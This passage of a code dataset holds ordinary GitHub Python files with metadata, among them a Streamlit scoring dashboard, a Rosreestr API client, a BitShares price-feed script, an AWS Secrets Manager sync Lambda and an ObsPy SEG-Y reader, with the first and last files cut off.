df\n\nst.set_page_config(page_title=\"Page Title\", layout=\"wide\")\nisi_file = \"\"\n\nst.markdown(\"\"\"\n \n\"\"\", unsafe_allow_html=True)\n\nhead1 = st.header('Real Time Online Tutorial Test', divider='rainbow')\nhead2 = st.write('**Open University** | :sunglasses: **:blue[Automatic Essay Scoring]**')\nconn = sqlite3.connect('database_aes03.db')\nstudent_names = load_student_names(conn)\n\nwith st.sidebar:\n    image = Image.open('student.jpg')\n    st.image(image)\n\ntab1, tab2, tab3, tab4 = st.tabs([\"Score\", \"Question\", \"Course\", \"Tutor/Lecturer\"])\ndf = union(conn)\n\nrow1_col1, row1_col2, row1_col3 = st.columns([3, 0.5, 11.5])\n\nwith row1_col1:\n    st.markdown('\\n')\n    x = filter_dataframe(df)\nwith row1_col2:\n    ()\nwith row1_col3:\n    
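# Wide right-hand column: table styling, the Scoring Data heading, and the scores table.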
st.markdown(\"\"\"\n \n \"\"\", unsafe_allow_html=True)\n\n st.markdown('

Scoring Data

', unsafe_allow_html=True)\n \n st.dataframe(x, width=3000, height= 413)\n\n#add_identity = st.selectbox(\n #\"Student Identity\", student_names\n #)\n\n#table = union(conn, add_identity)\n#st.table(table)\n \n","repo_name":"williamhilmysusatyo/streamlit-backup","sub_path":"interface_dosen.py","file_name":"interface_dosen.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"2782479202","text":"import os\nimport re\nimport sys\nimport random\n\n\nlength = int(sys.argv[1]) if len(sys.argv) == 2 else 5\nint_min = -10000\nint_max = 10000\n\nmakefile_cmd = 'make'\nchecker_path = 'checker_Mac'\npush_swap_path = 'push_swap'\n\n\n\nos.popen(makefile_cmd).read()\n\nif not os.path.exists(push_swap_path) or not os.path.exists(checker_path):\n print(f'don\\'t find {push_swap_path} or {checker_path}')\n exit()\n\nargs = ' '.join([str(i) for i in random.sample(range(int_min, int_max), k=length)])\n\ncheck = os.popen(f'./{push_swap_path} {args}| ./{checker_path} {args}').read().removesuffix('\\n')\ncommands = int(re.findall('\\d+', os.popen(f'./push_swap {args}| wc -l').read())[0])\n\nprint(f'{check} - len {length} in {commands} commands | {args}')","repo_name":"Jintow/Push-Swap","sub_path":"python_tester.py","file_name":"python_tester.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"10561359507","text":"import sys\nimport nintaco\nimport pandas as pd\nimport numpy as np\nfrom kafka import KafkaProducer\nimport json\n\nprint(\"run with python, not python3\")\n\nframeCount = 0;\n\nnintaco.initRemoteAPI(\"localhost\", 9998)\n'''\nSince this is in python 2.7 due to constraints imposed by nintaco, I want to keep my engagement here to a minimum\n\nThis system gets the pixels from the API and Puts them untouched on a kafka queue to be used in the state synthesis layer\n\nI also imagine that this is the point where commands are input once the integration hits that point\n'''\nproducer = KafkaProducer(bootstrap_servers='localhost:9092')\napi = nintaco.getAPI()\n\n\n\ndef launch():\n api.addFrameListener(renderFinished)\n # api.addStatusListener(statusChanged)\n api.addActivateListener(apiEnabled)\n api.addDeactivateListener(apiDisabled)\n api.addStopListener(dispose)\n api.run()\n\ndef apiEnabled():\n print(\"Connection to emulator enabled\")\n\ndef apiDisabled():\n print(\"Connection to emulator disabled\")\n\ndef dispose():\n print(\"Connection to emulator stopped\")\n\ndef statusChanged(message):\n print(\"frameCount: %s\" % frameCount)\n print(\"Status message: %s\" % message)\n\ndef renderFinished():\n global frameCount\n if frameCount % (64*10) == 0:\n pixels = get_pixels_raw()\n \"\"\"\n First attempt to send messages to topic from actuation layer\n\n Imagine this will fail without some initial setup\n \"\"\"\n result = producer.send('emulator_to_environment', json.dumps(pixels))\n print('Sent message to emulator_to_environment with result: ', result)\n frameCount = 0\n frameCount += 1\n\ndef get_pixels_raw():\n pixels = [0] * (256*240)\n api.getPixels(pixels)\n return pixels\n\n\nif __name__ == \"__main__\":\n launch()\n","repo_name":"d00medman/wintermute_prototype_pre_organization","sub_path":"prototype/emulation_layer/actuation.py","file_name":"actuation.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} 
+{"seq_id":"30225684352","text":"import json\n\n\ndef format_string(new_value, path, node, action: str, result: list, old_value=None):\n path += node\n f_string = \"\"\n strange_means = [\"false\", \"true\", \"null\", \"[complex value]\"]\n if isinstance(new_value, dict):\n new_value = \"[complex value]\"\n if isinstance(old_value, dict):\n old_value = \"[complex value]\"\n else:\n pass\n if new_value not in strange_means and type(new_value) != int:\n new_value = f'\\'{new_value}\\''\n if old_value not in strange_means and type(old_value) != int:\n old_value = f'\\'{old_value}\\''\n if action == \"delete\":\n f_string = f'Property \\'{path}\\' was removed\\n'\n elif action == \"add\":\n f_string = f'Property \\'{path}\\' was added with value: {new_value}\\n'\n elif action == \"update\":\n f_string = f'Property \\'{path}\\' was updated. From {old_value} to {new_value}\\n'\n result.extend(f_string)\n return result\n\n\ndef status_node(list_of_node, node, status):\n count, result = 0, \"status\"\n for point in list_of_node:\n if point == node:\n count += 1\n if count == 1 and status == \"+\":\n result = \"add\"\n elif count == 2 and status == \"-\":\n result = \"update\"\n elif count == 1 and status == \" \":\n result = \"not change\"\n elif count == 1 and status == \"-\":\n result = \"delete\"\n return result\n\n\ndef separate_status_of_name(list_of_node):\n formate_node = []\n for point in list_of_node:\n point = point[0:len(point) - 1]\n formate_node.append(point)\n return formate_node\n\n\ndef status_key(diction: dict, result, path=\"\", depth=1):\n keys = list(diction.keys())\n formate_keys_name = separate_status_of_name(keys)\n for node in keys:\n status = str(node)[-1]\n node_for_check = node[0:len(str(node)) - 1]\n what_hapend = status_node(formate_keys_name, node_for_check, status)\n if isinstance(diction[node], dict) and status == \" \":\n path += str(node_for_check) + \".\"\n length_node = len(str(node_for_check))\n depth += 1\n status_key(diction[node], result, path, depth)\n path = path[0:len(path) - (length_node + 1)]\n depth -= 1\n if depth == 1:\n path = \"\"\n elif what_hapend == \"add\":\n format_string(diction[node], path, node_for_check, what_hapend, result)\n elif what_hapend == \"update\":\n old_value = diction[node_for_check + \"-\"]\n new_value = diction[node_for_check + \"+\"]\n format_string(new_value, path, node_for_check, what_hapend, result, old_value)\n elif what_hapend == \"delete\":\n format_string(diction[node], path, node_for_check, what_hapend, result)\n return result\n\n\ndef convert_to_json(diction: dict):\n keys = list(diction.keys())\n for node in keys:\n if isinstance(diction[node], dict):\n convert_to_json(diction[node])\n else:\n value = diction[node]\n if value is False:\n value = \"false\"\n elif value is None:\n value = \"null\"\n elif value is True:\n value = \"true\"\n diction[node] = value\n return diction\n\n\ndef convert_str(string, depth):\n convert = \" \" * depth\n length = len(convert)\n convert = convert[2:length] + string[-1] + \" \" + string[0:len(string) - 1]\n return convert\n\n\ndef convert_dict_to_list(diction, result_list, depth=1):\n keys = diction.keys()\n for node in keys:\n if isinstance(diction[node], dict):\n ma_str = convert_str(str(node), depth)\n result_list.extend(ma_str)\n result_list.extend(\": {\\n\")\n depth += 1\n convert_dict_to_list(diction[node], result_list, depth)\n depth -= 1\n result_list.extend(\" \" * depth + \"}\\n\")\n else:\n ma_str = convert_str(str(node), depth)\n result_list.extend(ma_str)\n 
result_list.extend(\": \")\n result_list.extend(list(str(diction[node])))\n result_list.extend(\"\\n\")\n return result_list, depth\n\n\ndef stylish(diction, mode):\n result_list = []\n finally_str = \"\"\n convert_to_json(diction)\n if mode == \"json\":\n convert_dict_to_list(diction, result_list)\n finally_str = \"{\\n\"\n for sym in result_list:\n finally_str += sym\n finally_str += \"}\"\n finally_str = json.dumps(finally_str)\n if mode == \"plain\":\n result_list = status_key(diction, result_list)\n result_list = result_list[0:len(result_list) - 1]\n for i in result_list:\n finally_str += i\n if mode == 'stylish':\n convert_dict_to_list(diction, result_list)\n finally_str = \"{\\n\"\n for sym in result_list:\n finally_str += sym\n finally_str += \"}\"\n return finally_str\n","repo_name":"shiffter/python-project-lvl2_finished","sub_path":"gendiff/formaters.py","file_name":"formaters.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7557535859","text":"import operator, sys\n\ndef sort_by_name_same_lastnames(names):\n names = sorted(names, key = operator.itemgetter(1))\n start = 0\n count = 1\n last_name = names[0][1]\n for i in range(1, len(names)):\n if last_name == names[i][1]:\n count += 1\n else:\n if count > 1:\n names[start:i] = sorted(names[start:i], key = operator.itemgetter(0))\n start = i\n count = 1\n last_name = names[i][1]\n if count > 1:\n names[start:] = sorted(names[start:], key = operator.itemgetter(0))\n return names\n\nname = sys.stdin.readline()\nnames = []\nname_history = []\nduplicates = []\nwhile name:\n name = name[:len(name) - 1].split(' ')\n names.append((name[0], name[1]))\n if name[0] not in name_history:\n name_history.append(name[0])\n else:\n if name[0] not in duplicates:\n duplicates.append(name[0])\n name = sys.stdin.readline()\n\nnames = sort_by_name_same_lastnames(names)\nfor name in names:\n if name[0] in duplicates:\n print(name[0], name[1])\n else:\n print(name[0])\n","repo_name":"gkamtzir/Kattis-Problems","sub_path":"roll_call.py","file_name":"roll_call.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"26478393300","text":"from typing import TYPE_CHECKING, Optional\n\nfrom pysqlcipher3 import dbapi2 as sqlcipher\n\nfrom rotkehlchen.db.dbhandler import DBHandler\nfrom rotkehlchen.errors.misc import InputError\nfrom rotkehlchen.types import AVAILABLE_MODULES_MAP, ChecksumAddress, ModuleName\n\nif TYPE_CHECKING:\n from rotkehlchen.db.drivers.gevent import DBCursor\n\n\nclass QueriedAddresses:\n\n def __init__(self, database: DBHandler):\n self.db = database\n\n def add_queried_address_for_module(self, module: ModuleName, address: ChecksumAddress) -> None:\n \"\"\"May raise:\n - InputError: If the address is already in the queried addresses for\n the module\n \"\"\"\n with self.db.user_write() as cursor:\n try:\n cursor.execute(\n 'INSERT INTO multisettings(name, value) VALUES(?, ?)',\n (f'queried_address_{module}', address),\n )\n except sqlcipher.DatabaseError as e: # pylint: disable=no-member\n raise InputError(\n f'Address {address} is already in the queried addresses for {module}',\n ) from e\n\n def remove_queried_address_for_module(\n self,\n module: ModuleName,\n address: ChecksumAddress,\n ) -> None:\n \"\"\"May raise:\n - InputError: If the address is not in the queried addresses for\n the module\n \"\"\"\n with self.db.user_write() 
as cursor:\n cursor.execute(\n 'DELETE FROM multisettings WHERE name=? AND value=?;',\n (f'queried_address_{module}', address),\n )\n if cursor.rowcount != 1:\n raise InputError(f'Address {address} is not in the queried addresses for {module}')\n\n def get_queried_addresses_for_module(\n self,\n cursor: 'DBCursor',\n module: ModuleName,\n ) -> Optional[tuple[ChecksumAddress, ...]]:\n \"\"\"Get a List of addresses to query for module or None if none is set\"\"\"\n cursor = self.db.conn.cursor()\n query = cursor.execute(\n 'SELECT value FROM multisettings WHERE name=?;',\n (f'queried_address_{module}',),\n )\n result = tuple(entry[0] for entry in query)\n return None if len(result) == 0 else result\n\n def get_queried_addresses_per_module(self) -> dict[ModuleName, tuple[ChecksumAddress, ...]]:\n \"\"\"Get a mapping of modules to addresses to query for that module\"\"\"\n mapping: dict[ModuleName, tuple[ChecksumAddress, ...]] = {}\n with self.db.conn.read_ctx() as cursor:\n for module in AVAILABLE_MODULES_MAP:\n result = self.get_queried_addresses_for_module(cursor, module) # type: ignore\n if result is not None:\n mapping[module] = result # type: ignore\n\n return mapping\n","repo_name":"rotki/rotki","sub_path":"rotkehlchen/db/queried_addresses.py","file_name":"queried_addresses.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":2391,"dataset":"github-code","pt":"92"} +{"seq_id":"72649197740","text":"import asyncio\n\nimport aiohttp\nfrom loguru import logger\nfrom yarl import URL\nfrom django.conf import settings\nSSL_VERIFY = settings.SSL_VERIFY\n\ntimeout = aiohttp.ClientTimeout(total=15)\n\n\nclass NotFound(Exception):\n pass\n\n\nclass TemporaryUnavalible(Exception):\n pass\n\n\nclass RosreestrClient:\n @classmethod\n async def find_objects(cls, dadata):\n try:\n return await cls._find_objects(dadata)\n except asyncio.TimeoutError:\n raise TemporaryUnavalible\n\n @classmethod\n async def _find_objects(cls, dadata):\n url = 'https://rosreestr.ru/api/online/address/fir_objects'\n connector = aiohttp.TCPConnector()\n async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:\n params = await cls._get_settl(session, dadata)\n params['street'] = str(dadata['data']['street'])\n params['house'] = dadata['data']['house']\n if dadata['data']['flat']:\n params['apartment'] = dadata['data']['flat']\n if dadata['data']['block']:\n params['building'] = dadata['data']['block']\n url += '?'\n for key, value in params.items():\n url += f'&{key}={value}'\n\n async with session.get(URL(url, encoded=False), ssl=SSL_VERIFY) as response:\n if response.status == 204:\n raise NotFound\n js = await response.json()\n logger.debug(js)\n return js\n\n @classmethod\n async def _get_reg(cls, session: aiohttp.ClientSession, dadata_query):\n query = dadata_query['data']['city'] or dadata_query['data']['area']\n macro_reg = await cls._get_macro_reg(session, dadata_query)\n async with session.get(f'https://rosreestr.ru/api/online/regions/{macro_reg}', ssl=SSL_VERIFY) as response:\n data = await response.json()\n for item in data:\n if query.lower() in item['name'].lower():\n return {'macroRegionId': macro_reg, 'regionId': item['id']}\n return query\n\n @classmethod\n async def _get_settl(cls, session: aiohttp.ClientSession, dadata_query):\n query = dadata_query['data']['city'] or dadata_query['data']['settlement']\n reg = await cls._get_reg(session, dadata_query)\n async with 
session.get(f'https://rosreestr.ru/api/online/regions/{reg[\"regionId\"]}', ssl=SSL_VERIFY) as respone:\n data = await respone.json()\n for item in data:\n if query.lower() in item['name'].lower():\n # reg['settlementId'] = item['id']\n return reg\n raise NotFound\n\n @staticmethod\n async def _get_macro_reg(session: aiohttp.ClientSession, dadata_query):\n query = dadata_query['data']['region']\n query = query.replace('Респ', '')\n query = query.replace('/Якутия/', '')\n query = query.strip()\n async with session.get('https://rosreestr.gov.ru/api/online/macro_regions', ssl=SSL_VERIFY) as response:\n data = await response.json()\n for item in data:\n if query.lower() in item['name'].lower():\n return item['id']\n return query\n","repo_name":"avbskyfox/rr_bot","sub_path":"rr_backend/rosreestr.py","file_name":"rosreestr.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15867588863","text":"\"\"\"Adds a Repo.extra field\n\nRevision ID: 8ddc720fb6d2\nRevises: 4ace333da7ba\nCreate Date: 2016-08-29 09:31:11.953895\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '8ddc720fb6d2'\ndown_revision = '4ace333da7ba'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom shaman import models\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('repos', sa.Column('extra', models.types.JSONType(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('repos', 'extra')\n ### end Alembic commands ###\n","repo_name":"ceph/shaman","sub_path":"alembic/versions/8ddc720fb6d2_adds_a_repo_extra_field.py","file_name":"8ddc720fb6d2_adds_a_repo_extra_field.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"92"} +{"seq_id":"40992621858","text":"import os\n\nimport torch\nimport torchvision.transforms as transforms\n\n\nimport cv2\n\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\n\n\nclass CustomStanfordImageDataset():\n\n def __init__(self, dogs_breed_dictionary,transforms,device):\n\n self.device = device\n self.dogs_breed_dictionary = dogs_breed_dictionary\n\n\n #Loading all the images along with their labels into memory\n self.images_and_labels = []\n\n #Transform which will be applied in order to prepare data for the Neural-Network\n image_transforms = transforms\n\n #Fitting Ordinal and OneHotEncoder to later encode labels\n self.labelEncoder = LabelEncoder()\n self.labelEncoder = self.labelEncoder.fit(list(self.dogs_breed_dictionary.keys()))\n label_encoded = self.labelEncoder.transform(list(self.dogs_breed_dictionary.keys()))\n\n self.oneHotEncoder = OneHotEncoder(sparse=False)\n self.oneHotEncoder = self.oneHotEncoder.fit(label_encoded.reshape(len(label_encoded),1))\n\n\n\n for dog_breed in sorted(list(self.dogs_breed_dictionary.keys())):\n\n # For Each dir, read all the images, and store them into memory with their corrosponding labels i-e dirname\n for dog_image_path in self.dogs_breed_dictionary[dog_breed]:\n try:\n\n loaded_image = cv2.imread(dog_image_path, cv2.IMREAD_COLOR)\n loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2RGB)\n transformed_image = image_transforms(loaded_image)\n\n #Pushing loaded and transformed data into dataset store\n one_hot_encoder_label = 
torch.tensor(self.oneHotEncoder.transform(self.labelEncoder.transform([dog_breed]).reshape(1,1)), dtype=torch.float32)\n                    self.images_and_labels.append((transformed_image.type(torch.float32), one_hot_encoder_label))\n\n                except Exception as e:\n                    print(\"Exception while processing and loading image from disk, image skipped:\", e)\n\n\n\n    def __getitem__(self, index):\n        image_data, image_label = self.images_and_labels[index]\n        return (image_data.to(self.device), image_label.to(self.device))\n\n\n    def __len__(self):\n        return len(self.images_and_labels)\n","repo_name":"m-aamir95/dog-species-classification-streamlit-app","sub_path":"DL_Backend/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"20166502078","text":"# Q2 Write a Python program to count the frequency of each element in a list and return a 
dictionary\n# with the elements as keys and their frequencies as values.\ndef count_frequency(input_list):\n frequency_dict = {}\n for element in input_list:\n frequency_dict[element] = frequency_dict.get(element, 0) + 1\n return frequency_dict\ninput_list = input(\"Enter elements of the list separated by spaces: \").split()\nresult = count_frequency(input_list)\nprint(\"Frequency dictionary:\", result)\n","repo_name":"upesacm/21DaysOfCode-2023","sub_path":"Python/Supragya/Day17_Q2.py","file_name":"Day17_Q2.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"3320812854","text":"import os_tools.XmlFileHandler as xh\nimport os_tools.FileHandler as fh\nimport os_tools.Tools as tools\nimport os_tools.StringUtils as su\n\n\n##################################################################################\n#\n# just the StringsImporter boiler plate script\n#\n##################################################################################\n\n\ndef build_strings_dict(xlsx_path, logger):\n \"\"\"\n Will return a dictionary containing all of the strings in the xlsx file.\n The dictionary will look like so:\n {\n \"French\": {\"app_name': \"C'est ma vie\", \"capital\": \"C\"est ma vie\", \"add_tab\": \"Jours de la semaine\"},\n \"German\": {\"app_name\": \"Berufe\\n\", \"capital\": \"Der Weg zur Post\", \"add_tab\":},\n \"Hindi\": {\"app_name\": \"शब्दावली\", \"capital\": \"देशों\", \"add_tab\": \"कंबोडिया\"}\n }\n \"\"\"\n from pyexcel_xlsx import get_data\n import json\n raw_workbook_data = get_data(xlsx_path, start_row=3, start_column=5, column_limit=1)\n # data_values = get_data(xlsx_path, start_row=3, end_row=len(output_dict),start_column=1, column_limit=1)\n\n raw_workbook_dict = json.loads(str(json.dumps(raw_workbook_data)))\n # dict_values = json.loads(str(json.dumps(data_values)))\n xlsx_dict = {}\n\n # start the workbooks loop\n for language in raw_workbook_dict.keys():\n language_dict = {}\n\n # scrape the codes list\n codes_list = list(filter(None, raw_workbook_dict[language]))\n\n # scrape the translated words list\n translated_words_data = get_data(xlsx_path, start_row=3, start_column=1, column_limit=1)[language]\n translated_words_list = translated_words_data[0:len(codes_list)]\n logger.info('Parsing ' + language)\n # loop on all of the codes list (the rightest column)\n for i in range(len(codes_list)):\n if translated_words_list[i] is None or not translated_words_list[i]:\n logger.warning('Seems like the string name \\'' + codes_list[i][0] + '\\' didn\\'t got translated to ' + language + '. Would you like to continue? [yes]')\n to_continue = tools.ask_for_input('')\n if not su.str2bool(to_continue):\n logger.info('Exiting')\n return\n\n else:\n language_dict[codes_list[i][0]] = translated_words_list[i][0]\n\n xlsx_dict[language] = language_dict\n return xlsx_dict\n\n\n# will turn the xlsx dictionary to strings.xml files\ndef xlsx_dict_to_strings_file(xlsx_dict, output_dir, logger):\n logger.info('All of the languages parsed successfully. 
Creating the strings.xml files')\n for language in xlsx_dict.keys():\n language_output_dir = output_dir + '/' + language\n fh.create_dir(language_output_dir)\n output_file = language_output_dir + '/' + 'strings.xml'\n xml = xh.create_xml_file('resources', output_file)\n language_dict = xlsx_dict[language]\n for key, val in language_dict.items():\n xh.add_node(xml, 'string', {'name': key}, val)\n xh.save_xml_file(xml, output_file, True)\n logger.info('The ' + language + ' language file created successfully in:\\n ' + output_file)\n","repo_name":"osfunapps/os_android_strings_importer-py","sub_path":"os_android_strings_importer/StringsImporterBp.py","file_name":"StringsImporterBp.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"31027689112","text":"from turtle import Turtle, Screen\nimport pandas as pd\n\n# Turtle only accepts images in .gif format\nimage = r'us-states-game-start\\blank_states_img.gif'\nstates_csv_path = r'us-states-game-start\\50_states.csv'\n\nscreen = Screen()\nscreen.title('U.S States Game')\n\n# Making a turtle object in the shape of the image\nscreen.addshape(image)\nTurtle().shape(image)\n\n# Getting list of all states.\nstates_data = pd.read_csv(states_csv_path)\nstates_list = states_data.state.to_list() \n\ngame_is_on = True\nguessed_correctly = 0\n\nwhile game_is_on:\n \n # Game over when all guessed\n if guessed_correctly != 50:\n\n # Taking input from user\n user_answer = screen.textinput(f\"{guessed_correctly}/50 Guessed\", prompt = \"Enter the name of a state: \")\n user_answer_titlecased = user_answer.title()\n\n if user_answer_titlecased == 'Exit':\n game_is_on = False\n \n # Checking if guess exists in state_list\n if user_answer_titlecased in states_list:\n\n turtle = Turtle()\n turtle.hideturtle()\n turtle.penup()\n turtle.color('black')\n\n # Writing state name at correct coordinates\n row = states_data.loc[states_data['state'] == user_answer_titlecased]\n turtle.goto(int(row.x), int(row.y))\n turtle.write(f\"{user_answer}\")\n \n # Removing guessed guessed states from list\n states_list.remove(user_answer_titlecased)\n guessed_correctly += 1\n\n else:\n game_is_on = False\n\n# Csv of all missed states\nmissed_states_dict = {'states': states_list}\nmissed_states_df = pd.DataFrame(missed_states_dict)\nmissed_states_df.to_csv('missed_states.csv')\n\nscreen.exitonclick()\n","repo_name":"kritij19/100-days-of-code","sub_path":"U.S.StatesGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"43606363144","text":"from datetime import datetime\nimport math\nfrom . 
import FeedSource\n\nSECONDS_PER_DAY = 60 * 60 * 24\n\nclass Norm(FeedSource):\n\n    def _norn_feed(self, amplitude, reference_timestamp, current_timestamp, period, phase_offset):\n        \"\"\"\n        Given the reference timestamp, the current timestamp, the period (in days), the phase (in days), the reference asset value (i.e. 1.00) and the amplitude (> 0 and < 1), output the current value.\n        \"\"\"\n        waveform = math.sin(((((current_timestamp - (reference_timestamp + phase_offset))/period) % 1) * period) * ((2*math.pi)/period)) # Only change for an alternative HERTZ ABA.\n        return 1 + (amplitude * waveform)\n\n    def _fetch(self):\n        feed = {}\n\n        reference_timestamp = datetime.strptime(\"2015-10-13T14:12:24\", \"%Y-%m-%dT%H:%M:%S\").timestamp() # Bitshares 2.0 genesis block timestamp\n        current_timestamp = datetime.now().timestamp() # Current timestamp for reference within the script\n        amplitude = 0.05303030303\n        period = SECONDS_PER_DAY * 28\n\n        urthr_value = self._norn_feed(\n            amplitude,\n            reference_timestamp,\n            current_timestamp,\n            period,\n            SECONDS_PER_DAY * 0 # phase offset\n        )\n        self.add_rate(feed, 'BTS', 'URTHR', urthr_value, 1.0)\n\n        verthandi_value = self._norn_feed(\n            amplitude,\n            reference_timestamp,\n            current_timestamp,\n            period,\n            SECONDS_PER_DAY * 9.33 # phase offset\n        )\n        self.add_rate(feed, 'BTS', 'VERTHANDI', verthandi_value, 1.0)\n\n        skuld_value = self._norn_feed(\n            amplitude,\n            reference_timestamp,\n            current_timestamp,\n            period,\n            SECONDS_PER_DAY * 18.66 # phase offset\n        )\n        self.add_rate(feed, 'BTS', 'SKULD', skuld_value, 1.0)\n\n        return feed\n","repo_name":"shulthz/bitshares-pricefeed","sub_path":"bitshares_pricefeed/sources/norm.py","file_name":"norm.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"92"} +{"seq_id":"37738628560","text":"# -*- coding: utf-8 -*-\nfrom bda.plone.orders.common import acquire_vendor_or_shop_root\nfrom bda.plone.orders.interfaces import IVendor\nfrom bda.plone.orders.tests import Orders_INTEGRATION_TESTING\nfrom bda.plone.orders.tests import set_browserlayer\nfrom Products.CMFPlone.interfaces import IPloneSiteRoot\nfrom zope.interface import alsoProvides\n\nimport unittest\n\n\nclass TestOrders(unittest.TestCase):\n    layer = Orders_INTEGRATION_TESTING\n\n    def setUp(self):\n        self.portal = self.layer[\"portal\"]\n        self.request = self.layer[\"request\"]\n        set_browserlayer(self.request)\n\n\nclass DummyContext(dict):\n    __parent__ = None\n\n    def __nonzero__(self):\n        return True\n\n    def __setitem__(self, key, val):\n        assert isinstance(val, DummyContext)\n        val.__parent__ = self\n        super(DummyContext, self).__setitem__(key, val)\n\n\nclass TestOrdersUnit(unittest.TestCase):\n    def setUp(self):\n        root = DummyContext()\n        root[\"sub1\"] = DummyContext()\n        root[\"sub1\"][\"subsub1\"] = DummyContext()\n        root[\"sub2\"] = DummyContext()\n\n        alsoProvides(root, IPloneSiteRoot)\n        alsoProvides(root[\"sub1\"], IVendor)\n        self.root = root\n\n    def test_acquire_vendor_or_shop_root(self):\n        root = self.root\n        self.assertEqual(\n            acquire_vendor_or_shop_root(root[\"sub1\"][\"subsub1\"]), root[\"sub1\"]\n        )\n        self.assertEqual(acquire_vendor_or_shop_root(root[\"sub2\"]), root)\n","repo_name":"bluedynamics/bda.plone.orders","sub_path":"src/bda/plone/orders/tests/test_orders.py","file_name":"test_orders.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"12143259651","text":"import json\nimport 
boto3\nimport os\n\ndef main(event, context):\n return sync_secrets(event)\n\ndef sync_secrets(event):\n local_region = os.environ['AWS_REGION']\n remote_region = os.environ['remote_region']\n exceptions = os.environ['exceptions'].split(',')\n secret_id = event[\"detail\"][\"requestParameters\"][\"secretId\"]\n\n if secret_id in exceptions:\n print(f\"Secret-id {secret_id} is in the exceptions list and will not be synced\")\n return {\n 'statusCode': 403,\n 'body': f\"Secret-id {secret_id} is in the exceptions list and will not be synced\" \n }\n\n if not check_secret_availability(secret_id, local_region):\n return {\n 'statusCode': 503,\n 'body': f\"Secret-id {secret_id} is unavailable in {local_region}\" \n }\n\n if not check_secret_availability(secret_id, remote_region):\n return {\n 'statusCode': 503,\n 'body': f\"Secret-id {secret_id} is unavailable in {remote_region}\" \n }\n\n try:\n local_sm = boto3.client('secretsmanager', region_name=local_region)\n remote_sm = boto3.client('secretsmanager', region_name=remote_region)\n\n local_secret_value = local_sm.get_secret_value(SecretId=secret_id)['SecretString']\n remote_secret_value = remote_sm.get_secret_value(SecretId=secret_id)['SecretString']\n \n if local_secret_value != remote_secret_value:\n print(f\"Secret {secret_id} is out of sync\")\n remote_sm.put_secret_value(SecretId=secret_id,SecretString=local_secret_value)\n print(f\"Synchronization complete!\")\n return {\n 'statusCode': 200,\n 'body': f\"Syncing of secret:{secret_id} completed!\"\n }\n else:\n print(f\"Secret {secret_id} is in sync, no need to resync\")\n return {\n 'statusCode': 200,\n 'body': f\"Secret:{secret_id} is already synced!\"\n }\n\n except Exception as e: \n return {\n 'statusCode': 503,\n 'body': e\n }\n \ndef check_secret_availability(secret_id, region):\n sm = boto3.client('secretsmanager', region_name=region)\n try:\n sm.describe_secret(SecretId=secret_id)\n print(f\"Secret {secret_id} is available in {region}\")\n return True\n except Exception as e: \n print(f\"Secret {secret_id} is NOT available in {region}\")\n print(e)\n return False","repo_name":"atanasna/pulumi_examples","sub_path":"sol-1/example_2_sm_syncer/scripts/sm_syncer.py","file_name":"sm_syncer.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71880479021","text":"import io\nimport os\nfrom struct import pack, unpack\nimport warnings\n\nimport numpy as np\n\nfrom obspy import Trace, UTCDateTime\nfrom obspy.core import AttribDict\n\nfrom .header import (BINARY_FILE_HEADER_FORMAT,\n DATA_SAMPLE_FORMAT_PACK_FUNCTIONS,\n DATA_SAMPLE_FORMAT_SAMPLE_SIZE,\n DATA_SAMPLE_FORMAT_UNPACK_FUNCTIONS, ENDIAN,\n TRACE_HEADER_FORMAT, TRACE_HEADER_KEYS)\nfrom .unpack import OnTheFlyDataUnpacker\nfrom .util import unpack_header_value, _pack_attribute_nicer_exception\n\n\nclass SEGYError(Exception):\n \"\"\"\n Base SEGY exception class.\n \"\"\"\n pass\n\n\nclass SEGYTraceHeaderTooSmallError(SEGYError):\n \"\"\"\n Raised if the trace header is not the required 240 byte long.\n \"\"\"\n pass\n\n\nclass SEGYTraceReadingError(SEGYError):\n \"\"\"\n Raised if there is not enough data left in the file to unpack the data\n according to the values read from the header.\n \"\"\"\n pass\n\n\nclass SEGYTraceOnTheFlyDataUnpackingError(SEGYError):\n \"\"\"\n Raised if 